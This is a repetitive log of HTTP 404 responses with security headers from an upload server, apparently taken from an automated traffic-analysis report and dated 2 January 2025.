1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4z6xf3v4O9nOF38TImOYZ2V7kK8b1ngSojAxQbgCCglZPTrIKI4Hp8NTFFRKAaz0DeContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:25 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-NtkrTJjYXmu21pxBvLHfhA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7qDt-8NfckExTu2OL1mn18p5-xVdUlguKz_eKShpWmfj0a6D_EBRokRTT-xc5dXdW7Ksv6_bQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:25 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-hNrLQLGYCRR0tdftDRva2w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC41PEfz3kO-Ybj1ovuu0Bz_LEaG0169eKf3hK_t0Bhqa3cZihpjvMlfCqOD6f2Alv3RSLNyzO4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-v-jE2eAoovQVPkGWfJBbJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC619lobztDXgK_qeUDuYLwEHufRAVOwRwp99FgbWZm_0_neFgd5iM_mWOUfrbIgmVhRvGk3G8IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:28 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CVNN-gFkhcEdrsQfap1zgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7cfaJleRJ02IgCScZkWI-Ip82OdOXklo3TDf625DZMMF-vqv2vG1DBe6afWSjI0EwhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-v0KfeAktH00tcv8QYrLA2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7h64zFbAwM5HZ0IbSCWKNCKI7ffN4jEQziI3k0v-EQ7ZH_wtnD9ey_IAb4JOQLsPgho60zqTYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-p1ET6guYAgR2PUEOF1BTbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6QEl_x6cIAQiflk3hbBgStAf8LLxgU41mnxKblxDAU4l98nrUDceqF3PQN57n1XrfY7ellHxcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:30 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-tExtbEtSLne7EBV-kWUA0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50cAT_C5SEFhb5c2BOV8g_VoIWnqdgUhN1eYpmH2PO1BW5lkgYGoG4y1Cl29kXSmCfContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-gCkx3r1EQbHevbXp739iZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4yeL90xrO1Sx9ere9W88D5eUced247ITk2H6g0J1FTW44uyJ6PejgACgBAFCNlgI-YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:32 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qx5I-tlHyvV1h75KmD-97Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ThkGaDbigguh77pL1LF71tnN2N2r2UpCgt0yGwPYpM-_U7iEUHeAkLgTEYAKfcRydContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:32 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_Q6RJdQsF50F5w4GRSROvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5z4mplmZY55kM3Rcz_ngXJMz57lmzJ3IQ2bJCMq13hiNSrnne3NQmGkVwmIS5PgXJuContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-JyDZUbPVi-tc1mys42QVjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC67k6uqIcWrZaOTOz5QJ7_IRJSATVARl6DPZc4wtW6rNBOuvm75646nXiWJocLwdBj5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-qgasOLdVoSXAQT09EjeoQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6fgfYFI47oOe4viAvVUEZgURBt5YXWSJe19vEEFDV23Pm6IdGv1lrSmTaczaF5RY62oBC_c3MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:36 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-LyZQGQuUmLFvDRdey6bLGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5PlqmiytNEJWUrakwiBRjydUUTzQVnO2XYvT-5DMew4wyzLDo-9fzhbdkSvnTMpI6EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-XL9zlLdkB5gKOxiCTt_z7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC40bxB4PXsLE-DTzsWpm08xwBMGMU9KlTuQMyk4-jRsQ_5BR881QzUlp7Qe-h-czpktl7L6Xi0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Z4BB0QuSemy4QpCKJ5_xkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5a8XwhrHZF_9M96K1QZXorBm7kWDTmxywjHSjq_aT4xW71jWk7wNxw1Wn4j3ddrYAy-dyblJQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:39 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-SVmHqhzjBLSzwfufTFoDQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6985Naq7TMxJNRsiHejvYqX4icYUOsVjR1xkCV591lEV5tOse-BwgwxX9U553uHOTGsaiYQ5kContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:40 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Su-wVxDVXbkv2L97gedC5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ATeWI5rERMLe4r5NXBRWSxv16ocnwPPwQgOjB1yeUTfZv0kdX3H-yrEO3zsape5MFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:40 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-joNS8WnKsQt6cAYFrQ0jTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6MWCXzPuo7pzxsrNamqKqybbzNErXtd7_y-MAs9wLOegBhcCHBLzoeg8aJACytWmW0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-huu2ZdrCQYI6ATmwUxNtEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4JU1aAXbdqtOJexsSymc4nu1AsLLkxSPEEnpd4gzdTOx8opaBKv_KoxE0HtEgyhCa9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:29:41 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-CwULgZ5LGn4COrBT6pym7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
